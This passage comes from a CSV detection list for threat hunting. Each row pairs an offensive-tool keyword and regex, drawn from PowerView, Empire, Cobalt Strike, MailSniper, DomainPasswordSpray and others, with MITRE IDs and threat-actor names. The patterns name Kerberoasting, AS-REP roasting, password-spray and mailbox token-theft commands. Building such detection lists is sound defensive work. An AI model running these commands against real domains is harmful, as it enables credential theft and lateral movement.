Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45976" "*Get-DomainGPOUserLocalGroupMapping*",".{0,1000}Get\-DomainGPOUserLocalGroupMapping.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45977" "*Get-DomainGPOUserLocalGroupMapping*",".{0,1000}Get\-DomainGPOUserLocalGroupMapping.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG 
PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45978" "*Get-DomainGroupMember -Identity ""Domain Admins"" |*",".{0,1000}Get\-DomainGroupMember\s\-Identity\s\""Domain\sAdmins\""\s\|.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45979" "*Get-DomainGroupMemberDeleted*",".{0,1000}Get\-DomainGroupMemberDeleted.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45980" "*Get-DomainManagedSecurityGroup*",".{0,1000}Get\-DomainManagedSecurityGroup.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45981" "*Get-DomainObjectACL -*",".{0,1000}Get\-DomainObjectACL\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45982" "*Get-DomainSearcher*",".{0,1000}Get\-DomainSearcher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45983" "*GetDomainsForEnumeration*",".{0,1000}GetDomainsForEnumeration.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","45984" "*Get-DomainSpn*",".{0,1000}Get\-DomainSpn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SQLInstanceDomain.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45985" "*Get-DomainSpn*",".{0,1000}Get\-DomainSpn.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","45986" "*Get-DomainSPNTicket *",".{0,1000}Get\-DomainSPNTicket\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","45987" "*getdomainspnticket*",".{0,1000}getdomainspnticket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45988" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","BloodHound","Kerberoasting With PowerView","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","45989" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","45990" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45991" "*Get-DomainSPNTicket*",".{0,1000}Get\-DomainSPNTicket.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45992" 
"*GetDomainSPNTickets(*",".{0,1000}GetDomainSPNTickets\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","45993" "*Get-DomainUser -PreauthNotRequired*",".{0,1000}Get\-DomainUser\s\-PreauthNotRequired.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45995" "*Get-DomainUser -SPN | select samaccountname,serviceprincipalname*",".{0,1000}Get\-DomainUser\s\-SPN\s\|\sselect\ssamaccountname,serviceprincipalname.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45996" "*Get-DomainUser -TrustedToAuth | select userprincipalname",".{0,1000}Get\-DomainUser\s\-TrustedToAuth\s\|\sselect\suserprincipalname","offensive_tool_keyword","AD exploitation cheat 
sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45997" "*Get-DomainUserList -Domain * -RemoveDisabled *",".{0,1000}Get\-DomainUserList\s\-Domain\s.{0,1000}\s\-RemoveDisabled\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","45998" "*Get-DXWebcamVideo.ps1*",".{0,1000}Get\-DXWebcamVideo\.ps1.{0,1000}","offensive_tool_keyword","SharpDXWebcam","Utilizing DirectX and DShowNET assemblies to record video from a host's webcam","T1123 - T1059.001 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/snovvcrash/SharpDXWebcam","1","1","N/A","N/A","8","1","87","10","2023-07-19T21:09:00Z","2023-07-12T03:26:24Z","45999" "*getent passwd | grep sh$ | cut -d *",".{0,1000}getent\spasswd\s\|\sgrep\ssh\$\s\|\scut\s\-d\s.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","46001" "*getEnvExitPtr.exe*",".{0,1000}getEnvExitPtr\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 
- T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46002" "*Get-ExchangeAccessToken*",".{0,1000}Get\-ExchangeAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46003" "*Get-ExoPsAccessToken*",".{0,1000}Get\-ExoPsAccessToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46004" "*getExploit.py*",".{0,1000}getExploit\.py.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. 
A similar script exists in Kali Linux, but this Python script provides more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z","46005" "*Get-ExploitableSystem -Verbose*",".{0,1000}Get\-ExploitableSystem\s\-Verbose.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","46006" "*getexploitablesystem*",".{0,1000}getexploitablesystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","46007" "*Get-ExploitableSystem*",".{0,1000}Get\-ExploitableSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 